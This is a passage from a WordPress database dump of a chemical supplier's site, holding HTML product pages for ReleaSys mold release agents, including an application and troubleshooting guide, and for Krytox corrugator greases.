href="https://en.wikipedia.org/wiki/Radical_polymerization">https://en.wikipedia.org/wiki/Radical_polymerization</a>', 'Vazo Free Radical Initiator: Benefits and Uses', '', 'inherit', 'closed', 'closed', '', '1601-revision-v1', '', '', '2016-10-24 17:17:36', '2016-10-24 17:17:36', '', 1601, 'https://www.miller-stephenson.com/1601-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2735, 111, '2016-10-24 19:42:43', '2016-10-24 19:42:43', '', '', '', 'publish', 'closed', 'closed', '', '2735', '', '', '2016-10-24 19:42:43', '2016-10-24 19:42:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/2735/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2736, 3, '2016-10-24 19:57:38', '2016-10-24 19:57:38', '<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n<span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cured ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passess.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 19:57:38', '2016-10-24 19:57:38', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2737, 3, '2016-10-24 19:58:13', '2016-10-24 19:58:13', '<div data-canvas-width="370.56179999999995">Miller-Stephenson has generated a mold release application guide to help aid customers with the proper surface preparation and application of its new semi-permanent release agents. Semi-permanent mold release agents are state of the art release agent systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys Semi-Permanent release agents</a> represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and Troubleshooting common molding issues guide to help aid our customers in applying ReleaSys.</p>\r\n<span style="text-decoration: underline; font-size: 115%;"><strong>Surface-Preparation</strong></span>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agents or contaminates are critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Application to Mold Surface</span></strong></span>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  Aerosolization minimizes over-application and facilitates the development of a uniform, thin film on the molding surface. Miller-Stephenson offers aerosolized cans of its ReleaSys product line (ie: <a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents-2/">ReleaSys 82, 85, 88, and 89</a>) which have been optimized to deliver consistent application and coverage. Our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; a typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cured ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passess.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 19:58:13', '2016-10-24 19:58:13', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2738, 112, '2016-10-25 12:56:24', '2016-10-25 12:56:24', '', '', '', 'publish', 'closed', 'closed', '', '2738', '', '', '2016-10-25 12:56:24', '2016-10-25 12:56:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/2738/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2739, 113, '2016-10-25 14:42:32', '2016-10-25 14:42:32', '', '', '', 'publish', 'closed', 'closed', '', '2739', '', '', '2016-10-25 14:42:32', '2016-10-25 14:42:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/2739/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2740, 0, '2016-10-25 15:35:58', '2016-10-25 15:35:58', '', '', '', 'publish', 'closed', 'closed', '', '2740', '', '', '2016-10-25 15:35:58', '2016-10-25 15:35:58', '', 0, 'https://www.miller-stephenson.com/nf_sub/2740/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2741, 2, '2016-10-25 17:03:20', '2016-10-25 17:03:20', '<h1><strong>Krytox 226 FG —Setting the Standard for the Corrugating Industry</strong></h1>\r\nSince the 1980s, Krytox 226 FG anticorrosion greases have set the standard for high temperature bearing lubrication in corrugator applications. These products are the same high performance formulation the corrugated industry has trusted for years and, we are pleased to announce, are now certified for <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">incidental food contact.</a>\r\n<h4><strong>NSF Certification Means Safety and Confidence</strong></h4>\r\nTo provide absolute confidence and safety in food-related operations, these products are <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF H-1 food grade certified.</a> Corrugator Krytox 226 FG and Corrugator Krytox 227 FG provide you with peace-of-mind and full confidence that Krytox™ greases are non-toxic, and completely biologically and environmentally inert. Krytox™ corrugator greases are recommended for use in high temperature corrugated equipment applications and manufacture of food packaging materials where an H-1 rated lubricant is required.\r\n<h4><strong>Reliability and Performance for Your Most Demanding Needs</strong></h4>\r\nHigh temperature, extreme pressure Krytox greases excel in the most demanding environments. Their nonoxidizing chemistry and wide temperature range allows them to be used in temperature extremes. Its superior oil film strength reduces friction and abrasive wear to significantly extend equipment life in severe duty applications. Krytox provides excellent water washout resistance, and superior rust and corrosion protection for bearings and components. Krytox is silicone-free, contains no VOC materials or chlorine, and is not hazardous to the atmosphere or ozone layer.\r\n<h4><strong>Chemical and Environmental Compatibility</strong></h4>\r\nWhile Krytox fluorinated greases are non-reactive, its PFPE chemistry is very different from standard hydrocarbon or synthetic chemistries and should never be mixed with non-fluorinated greases.\r\n\r\nKrytox lubricants are inert and will not react with any materials they may come in contact with. The polymeric nature of these products is extremely resistant to moisture, so it stays in place during cleaning. Cleaners and disinfectants, both acidic and caustic types, do not affect them. Steam and high temperatures will not damage them. They do not damage plastic or elastomer seals, or cause corrosion to metals. They are nonflammable and are safe for use in oxygen service.\r\n<h4><strong>Packing the Bearing</strong></h4>\r\nNew bearings should be inspected for damage and cleanliness before use. New unlubricated bearings are often coated with hydrocarbon-based rust preventive oils to protect them during storage. These preservative\r\noils must be removed when using Krytox™ as a lubricant. Failure to do so could result in reduced bearing life. The preservatives coat the bearing surface to prevent rust and corrosion; but, if not removed prior to use, will prevent the grease from protecting the metal surface. If left on the bearing, the preservative coating can oxidize and harden, and can create debris that will contaminate the grease.\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-corrugator-greases/">To learn more about corrugator greases please click here.</a>', '226 FG Corrugator Grease', 'Corrugator Krytox 226 FG and Corrugator Krytox 227 FG provide you with peace-of-mind and full confidence that Krytox™ greases are non-toxic, and completely biologically and environmentally inert.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'closed', 'closed', '', 'krytox-226-fg', '', '', '2017-02-24 19:15:13', '2017-02-24 19:15:13', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=2741', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (2742, 2, '2016-10-25 16:58:26', '2016-10-25 16:58:26', '', 'Krytox 226 FG', '', 'inherit', 'closed', 'closed', '', 'shutterstock_353441450', '', '', '2016-10-25 16:58:38', '2016-10-25 16:58:38', '', 2741, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_353441450.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2743, 116, '2016-10-25 17:04:08', '2016-10-25 17:04:08', '', '', '', 'publish', 'closed', 'closed', '', '2743', '', '', '2016-10-25 17:04:08', '2016-10-25 17:04:08', '', 0, 'https://www.miller-stephenson.com/nf_sub/2743/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2744, 115, '2016-10-25 17:04:53', '2016-10-25 17:04:53', '', '', '', 'publish', 'closed', 'closed', '', '2744', '', '', '2016-10-25 17:04:53', '2016-10-25 17:04:53', '', 0, 'https://www.miller-stephenson.com/nf_sub/2744/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2745, 117, '2016-10-25 17:14:50', '2016-10-25 17:14:50', '', '', '', 'publish', 'closed', 'closed', '', '2745', '', '', '2016-10-25 17:14:50', '2016-10-25 17:14:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/2745/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2746, 2, '2016-10-25 17:35:05', '2016-10-25 17:35:05', '<h1><strong>Krytox 227 FG —Setting the Standard for the Corrugating Industry</strong></h1>\r\nSince the 1980s, Krytox 227 FG anticorrosion greases have set the standard for high temperature bearing lubrication in corrugator applications. These products are the same high performance formulation the corrugated industry has trusted for years and, we are pleased to announce, are now certified for <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">incidental food contact.</a>\r\n<h4><strong>NSF Certification Means Safety and Confidence</strong></h4>\r\nTo provide absolute confidence and safety in food-related operations, these products are <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">NSF H-1 food grade certified.</a> Corrugator Krytox 227 FG provides you with peace-of-mind and full confidence that Krytox™ greases are non-toxic, and completely biologically and environmentally inert. Krytox™ corrugator greases are recommended for use in high temperature corrugated equipment applications and manufacture of food packaging materials where an H-1 rated lubricant is required.\r\n<h4><strong>Reliability and Performance for Your Most Demanding Needs</strong></h4>\r\nHigh temperature, extreme pressure Krytox greases excel in the most demanding environments. Their nonoxidizing chemistry and wide temperature range allows them to be used in temperature extremes. Its superior oil film strength reduces friction and abrasive wear to significantly extend equipment life in severe duty applications. Krytox provides excellent water washout resistance, and superior rust and corrosion protection for bearings and components. Krytox is silicone-free, contains no VOC materials or chlorine, and is not hazardous to the atmosphere or ozone layer.\r\n<h4><strong>Chemical and Environmental Compatibility</strong></h4>\r\nWhile Krytox fluorinated greases are non-reactive, its PFPE chemistry is very different from standard hydrocarbon or synthetic chemistries and should never be mixed with non-fluorinated greases.\r\n\r\nKrytox lubricants are inert and will not react with any materials they may come in contact with. The polymeric nature of these products is extremely resistant to moisture, so it stays in place during cleaning. Cleaners and disinfectants, both acidic and caustic types, do not affect them. Steam and high temperatures will not damage them. They do not damage plastic or elastomer seals, or cause corrosion to metals. They are nonflammable and are safe for use in oxygen service.\r\n<h4><strong>Packing the Bearing</strong></h4>\r\nNew bearings should be inspected for damage and cleanliness before use. New unlubricated bearings are often coated with hydrocarbon-based rust preventive oils to protect them during storage. These preservative\r\noils must be removed when using Krytox™ as a lubricant. Failure to do so could result in reduced bearing life. The preservatives coat the bearing surface to prevent rust and corrosion; but, if not removed prior to use, will prevent the grease from protecting the metal surface. If left on the bearing, the preservative coating can oxidize and harden, and can create debris that will contaminate the grease.\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-corrugator-greases/">To learn more about corrugator greases please click here.</a>', '227 FG Corrugator Grease', 'Corrugator Krytox 226 FG and Corrugator Krytox 227 FG provide you with peace-of-mind and full confidence that Krytox™ greases are non-toxic, and completely biologically and environmentally inert.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'closed', 'closed', '', 'krytox-227-fg', '', '', '2017-02-24 19:15:28', '2017-02-24 19:15:28', '', 0, 'https://www.miller-stephenson.com/product/krytox-227-fg/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (2747, 2, '2016-10-25 17:37:42', '2016-10-25 17:37:42', '', 'Krytox 227 FG', '', 'inherit', 'closed', 'closed', '', 'shutterstock_373451461', '', '', '2016-10-25 17:37:57', '2016-10-25 17:37:57', '', 2746, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_373451461.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2748, 2, '2016-10-25 17:46:20', '2016-10-25 17:46:20', '<h1><span style="font-size: 120%;"><strong>Krytox Corrugator Greases</strong></span></h1>\r\n<h4><strong>Product Information</strong></h4>\r\nKrytox PFPE/PTFE corrugator greases have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Krytox lubricants help eliminate bearing lubrication as a cause of premature corrugator roll failures. Corrugator roll changes are significantly easier and quicker on single facers lubricated with Krytox corrugator greases.\r\n<h4><strong>Corrugators choose Krytox™ lubricants for many reasons:</strong></h4>\r\n<ul>\r\n 	<li>Most productive lubrication system for single facer bearings among all paper corrugating plants, equipment OEMs, and corrugator roll rebuilders</li>\r\n 	<li>Most thermally stable H1 base oil available</li>\r\n 	<li>Reduced risk of bearing failure</li>\r\n 	<li>Conversion support and PFPE lubrication/application training available</li>\r\n</ul>\r\nKrytox greases for the corrugating industry include:\r\n\r\n<strong>Krytox Corrugator <a href="https://www.miller-stephenson.com/product/krytox-226-fg/">226 FG</a>, 